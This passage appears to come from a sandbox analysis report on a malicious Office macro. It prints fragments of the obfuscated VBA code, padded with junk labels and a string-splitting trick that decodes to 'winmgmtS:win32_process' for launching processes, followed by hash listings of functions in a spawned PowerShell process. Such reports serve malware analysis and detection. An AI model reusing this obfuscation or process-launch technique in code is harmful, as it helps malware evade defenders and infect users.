                                                                                                                        Open "emmJF.oEJjOD.giiLoEJv" For Binary As 168

                                                                                                                        Open

                                                                                                                        18

                                                                                                                        Put # 168, , flWCjiEl

                                                                                                                        19

                                                                                                                        Close # 168

                                                                                                                        19

                                                                                                                        lyHkDXIOH:

                                                                                                                        21

                                                                                                                        Goto MPzbNgEEA

                                                                                                                        22

                                                                                                                        Dim cZYJwJI as String

                                                                                                                        23

                                                                                                                        Dim kWOHB as String

                                                                                                                        24

                                                                                                                        Open "aCKLVJaH.XtEZlTZ.CLelFNHGI" For Binary As 56

                                                                                                                        Open

                                                                                                                        27

                                                                                                                        Put # 56, , cZYJwJI

                                                                                                                        28

                                                                                                                        Close # 56

                                                                                                                        28

                                                                                                                        MPzbNgEEA:

                                                                                                                        30

                                                                                                                        Mrfzpndjp3s0k = VBA.Replace(Bnivj2ii9s31hmeej0, "qq" + ")(s2)(", Owy08cjm2ufmu)

                                                                                                                        Replace("wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)(Sqq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)(qq)(s2)(pqq)(s2)(qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)(","qq)(s2)(",) -> winmgmtS:win32_process

                                                                                                                        Owy08cjm2ufmu

                                                                                                                        executed
                                                                                                                        32

                                                                                                                        Goto WFNTzBZJ

                                                                                                                        33

                                                                                                                        Dim IbQUAAA as String

                                                                                                                        34

                                                                                                                        Dim iJBKl as String

                                                                                                                        35

                                                                                                                        Open "FhCyJa.yKJBb.ijMMEFEqB" For Binary As 152

                                                                                                                        Open

                                                                                                                        38

                                                                                                                        Put # 152, , IbQUAAA

                                                                                                                        39

                                                                                                                        Close # 152

                                                                                                                        39

                                                                                                                        WFNTzBZJ:

                                                                                                                        41

                                                                                                                        Goto fYohsF

                                                                                                                        42

                                                                                                                        Dim wpmyAZDbH as String

                                                                                                                        43

                                                                                                                        Dim UWnwUuJ as String

                                                                                                                        44

                                                                                                                        Open "eLPyC.ZdqCDyGC.QcmSHJFJl" For Binary As 155

                                                                                                                        Open

                                                                                                                        47

                                                                                                                        Put # 155, , wpmyAZDbH

                                                                                                                        48

                                                                                                                        Close # 155

                                                                                                                        48

                                                                                                                        fYohsF:

                                                                                                                        50

                                                                                                                        Goto vaaYK

                                                                                                                        51

                                                                                                                        Dim sgQCI as String

                                                                                                                        52

                                                                                                                        Dim VqytEGCGP as String

                                                                                                                        53

                                                                                                                        Open "sVsyIHHN.BqamC.SasWG" For Binary As 143

                                                                                                                        Open

                                                                                                                        56

                                                                                                                        Put # 143, , sgQCI

                                                                                                                        57

                                                                                                                        Close # 143

                                                                                                                        57

                                                                                                                        vaaYK:

                                                                                                                        59

                                                                                                                        End Function

                                                                                                                        Module: U2v6aydkxz3

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "U2v6aydkxz3"

                                                                                                                        2

                                                                                                                        Attribute VB_Base = "0{9EF41C7F-4993-4380-9AE2-6D1717463F09}{19CB9157-FC90-46F3-9DB5-DA54BE1A1A95}"

                                                                                                                        3

                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                        4

                                                                                                                        Attribute VB_Creatable = False

                                                                                                                        5

                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                        6

                                                                                                                        Attribute VB_Exposed = False

                                                                                                                        7

                                                                                                                        Attribute VB_TemplateDerived = False

                                                                                                                        8

                                                                                                                        Attribute VB_Customizable = False

                                                                                                                        Module: Y6lmxng9ukvy69c

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "Y6lmxng9ukvy69c"

                                                                                                                        2

                                                                                                                        Attribute VB_Base = "0{E341BE8E-52D5-48DE-84A6-3AE19C883DEE}{F6993466-D5CC-4E31-AC79-155044703F1F}"

                                                                                                                        3

                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                        4

                                                                                                                        Attribute VB_Creatable = False

                                                                                                                        5

                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                        6

                                                                                                                        Attribute VB_Exposed = False

                                                                                                                        7

                                                                                                                        Attribute VB_TemplateDerived = False

                                                                                                                        8

                                                                                                                        Attribute VB_Customizable = False

                                                                                                                        Module: Z4lx7rwdfqe

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "Z4lx7rwdfqe"

                                                                                                                        2

                                                                                                                        Attribute VB_Base = "0{D653B320-315E-4E0C-911D-6D22FF9BBBB9}{4825E711-FDA9-4AF6-8927-627BF1AB5E27}"

                                                                                                                        3

                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                        4

                                                                                                                        Attribute VB_Creatable = False

                                                                                                                        5

                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                        6

                                                                                                                        Attribute VB_Exposed = False

                                                                                                                        7

                                                                                                                        Attribute VB_TemplateDerived = False

                                                                                                                        8

                                                                                                                        Attribute VB_Customizable = False

                                                                                                                        Reset < >

                                                                                                                          Analysis Process: powershell.exe PID: 6388 Parent PID: 6276 powershell.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 00007FFA16254B25, Relevance: .5, Instructions: 526COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a0f0c1cafc55af361770db8e4744d8c223fa27a6718a86f556aa346b6181c909
                                                                                                                          • Instruction ID: 366babc96afa4bcf97a5f9f08d51c6d390d01f1561bd707b71f93e94e1993d49
                                                                                                                          • Opcode Fuzzy Hash: a0f0c1cafc55af361770db8e4744d8c223fa27a6718a86f556aa346b6181c909
                                                                                                                          • Instruction Fuzzy Hash: B1F1C331E18A4D8FDB98DF5CC495AE9BBF1FF99310F15816AD40DD7296CA24E842CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA16253B22, Relevance: .5, Instructions: 464COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 38dd4ada337c48b4aacfb0390d923be99281511fa538704ef1d0ad30facddf96
                                                                                                                          • Instruction ID: e71f44506a73406da62dd67d158aa41670e50db4782f306a8c0114daa993f894
                                                                                                                          • Opcode Fuzzy Hash: 38dd4ada337c48b4aacfb0390d923be99281511fa538704ef1d0ad30facddf96
                                                                                                                          • Instruction Fuzzy Hash: 7DC12963E0DB924FE356A71C98A65F57FA0DF43275B0950BBD0CCC71A3E90468478B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA16254112, Relevance: .5, Instructions: 453COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 501b05c9c2c785a614872f2ef5ebe8dcdad127944a23f6883d842c24c5b9ea2b
                                                                                                                          • Instruction ID: 4acb919981ba63ed04937d34362a619da4f4ad0b5302cf4c7314d09948574a69
                                                                                                                          • Opcode Fuzzy Hash: 501b05c9c2c785a614872f2ef5ebe8dcdad127944a23f6883d842c24c5b9ea2b
                                                                                                                          • Instruction Fuzzy Hash: BAE1AF31E08A4D8FDB94DF5CC495AE9BBE1FF69310F1581AAD44DD7296CA24E842CBC0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA16250FD9, Relevance: .2, Instructions: 172COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3c7ac84952db15420d34bf559f2e339f35d1422527625d34eb3085cfdaf1628c
                                                                                                                          • Instruction ID: 315b2a57c85ca628a5ad2a81f1b5e688469aee22aa7d4b33e16cd3e56c9429e6
                                                                                                                          • Opcode Fuzzy Hash: 3c7ac84952db15420d34bf559f2e339f35d1422527625d34eb3085cfdaf1628c
                                                                                                                          • Instruction Fuzzy Hash: 5751E23190CA894FD314DB18D855BE9BBE1FF86320F1586BBE44DC7292CE28A945CB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA16254B6C, Relevance: .1, Instructions: 127COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: de61d375179813cbc080bfea8519b9c31be0b998014dc92b3e92d2ec9acd4513
                                                                                                                          • Instruction ID: c05b6e22221e2ddae4cfeb21fa23be18f5ffcd96294606d5e0d32bcbbc1d6d00
                                                                                                                          • Opcode Fuzzy Hash: de61d375179813cbc080bfea8519b9c31be0b998014dc92b3e92d2ec9acd4513
                                                                                                                          • Instruction Fuzzy Hash: A931F631B2CE494FDB58EB1CC485AB5B7E1FB9A325B10417DD48EC3296DA25F842CB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA163215C8, Relevance: .1, Instructions: 118COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347945697.00007FFA16320000.00000040.00000001.sdmp, Offset: 00007FFA16320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16320000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 422363ed133977b6a186d331cd1343b902a0a1d5529f47cdc9df18d37a99f7f3
                                                                                                                          • Instruction ID: 139e65611d915c044b68944368a278bb81d447c91cf5d32cac290b5e7ad8bdfc
                                                                                                                          • Opcode Fuzzy Hash: 422363ed133977b6a186d331cd1343b902a0a1d5529f47cdc9df18d37a99f7f3
                                                                                                                          • Instruction Fuzzy Hash: 9231D232B0CE594FEAA5975C54516B9B3D2EF85721B5981BFCA1EC3282DD18EC104781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA163215F8, Relevance: .1, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347945697.00007FFA16320000.00000040.00000001.sdmp, Offset: 00007FFA16320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16320000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fd756a8ca18833a8a176ce66eec08756c125c0ac91c057696918464040a45a6a
                                                                                                                          • Instruction ID: 5cba2edc267eb637e6f5b450b65a98b49cb16ef87592f490d97a391c6338d4ac
                                                                                                                          • Opcode Fuzzy Hash: fd756a8ca18833a8a176ce66eec08756c125c0ac91c057696918464040a45a6a
                                                                                                                          • Instruction Fuzzy Hash: 4A01F936F1DE1A4FFAE9931C15A51BC91D6DF85622B5D91BED91EC3386DC0CEC100681
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA162537F5, Relevance: .0, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e6be35493053188d9cbec5877f0ca99d054379078a65ebec433f9951a719ee1c
                                                                                                                          • Instruction ID: db9ff0528c9a54d13c194b1efe82364ed350c7e1f8ea560f6da5e144658656d1
                                                                                                                          • Opcode Fuzzy Hash: e6be35493053188d9cbec5877f0ca99d054379078a65ebec433f9951a719ee1c
                                                                                                                          • Instruction Fuzzy Hash: 6601447111CB088FD758EF0CE451AA6B7E0FB95364F10056DE58AC7651DA36E881CB46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA16253D79, Relevance: .0, Instructions: 40COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f91a65502a46064268203043a33f1b3f5e592802017d922371ade84f366d0670
                                                                                                                          • Instruction ID: 01954017f07c5578ba1ff2f565417e98a7a9a701e2a6d605c3de9ce85c642fb7
                                                                                                                          • Opcode Fuzzy Hash: f91a65502a46064268203043a33f1b3f5e592802017d922371ade84f366d0670
                                                                                                                          • Instruction Fuzzy Hash: 6DF0303276CA084FD75C9A0CF8439F573D1E78A225B40417EE4CEC2696E91AB8428685
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA16254C68, Relevance: .0, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c0a1837f2d91ee6f6ee65dfdfdea5868d2b03cc674f5dfa5a4bc02074d39fd24
                                                                                                                          • Instruction ID: b9f1ef7fa4f19f999cc62016c4554a4a4f596b29f24f00a2e1817c74c2956bf8
                                                                                                                          • Opcode Fuzzy Hash: c0a1837f2d91ee6f6ee65dfdfdea5868d2b03cc674f5dfa5a4bc02074d39fd24
                                                                                                                          • Instruction Fuzzy Hash: 89F0653276CA084FD75C9A0CF8429B5B3D5E78A325B40417EE4CFC2287E917F8468685
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 00007FFA16250CD0, Relevance: .4, Instructions: 375COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cd3d42588d333d51cc6ae8c5fe7c58048554c2d5f85a7889ca4489a9718e3d73
                                                                                                                          • Instruction ID: 585369e4197ee494f01e5596718ced3ac2fa7da140060cb3142b6c05eb302a57
                                                                                                                          • Opcode Fuzzy Hash: cd3d42588d333d51cc6ae8c5fe7c58048554c2d5f85a7889ca4489a9718e3d73
                                                                                                                          • Instruction Fuzzy Hash: 1BB12731E1CA5A4FD338DB58D4446F1B7D0EF46325B25D5BEC48EC7682DA29B842CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA16250D87, Relevance: .3, Instructions: 256COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: eaa8aa6325ab8b811a9f0e166269e5174f6db56244e641a34f94acff7816210b
                                                                                                                          • Instruction ID: c171b1b0c67ececfc753e91819b8eea281c90ea47327517c040c2a7aaf2516fc
                                                                                                                          • Opcode Fuzzy Hash: eaa8aa6325ab8b811a9f0e166269e5174f6db56244e641a34f94acff7816210b
                                                                                                                          • Instruction Fuzzy Hash: 02610217E0DA615BE621776CFC965EABF90DF837717194073D1CCCA073DA08A88AC6A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA16250D7F, Relevance: .2, Instructions: 245COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1ea7cfdd6900cad9087e0ef75b842fb684e228d0465cc03e54159b97d8386f46
                                                                                                                          • Instruction ID: c01e257156583ff25019b8d506062cf21231ee19f4d6fbfa3aca041a061d2f0c
                                                                                                                          • Opcode Fuzzy Hash: 1ea7cfdd6900cad9087e0ef75b842fb684e228d0465cc03e54159b97d8386f46
                                                                                                                          • Instruction Fuzzy Hash: 0C612417E096615FD621B76CFC955DABF90DF833717194073D5CCCA163DA08688AC6D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00007FFA16250D30, Relevance: .2, Instructions: 230COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fc004e81c0bffcad840018f6869f0e5b57d262b24bfda5fa8295c915a8fa695e
                                                                                                                          • Instruction ID: fc43aa07a194b53a76ebd28524c7cfd3ee3d5c417fb012ee2373fd43e4b38f2e
                                                                                                                          • Opcode Fuzzy Hash: fc004e81c0bffcad840018f6869f0e5b57d262b24bfda5fa8295c915a8fa695e
                                                                                                                          • Instruction Fuzzy Hash: 23517B32E0CA194FE7289B68A4896F2B7D0EF47331B15917FC48EC7293D9287C458780
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%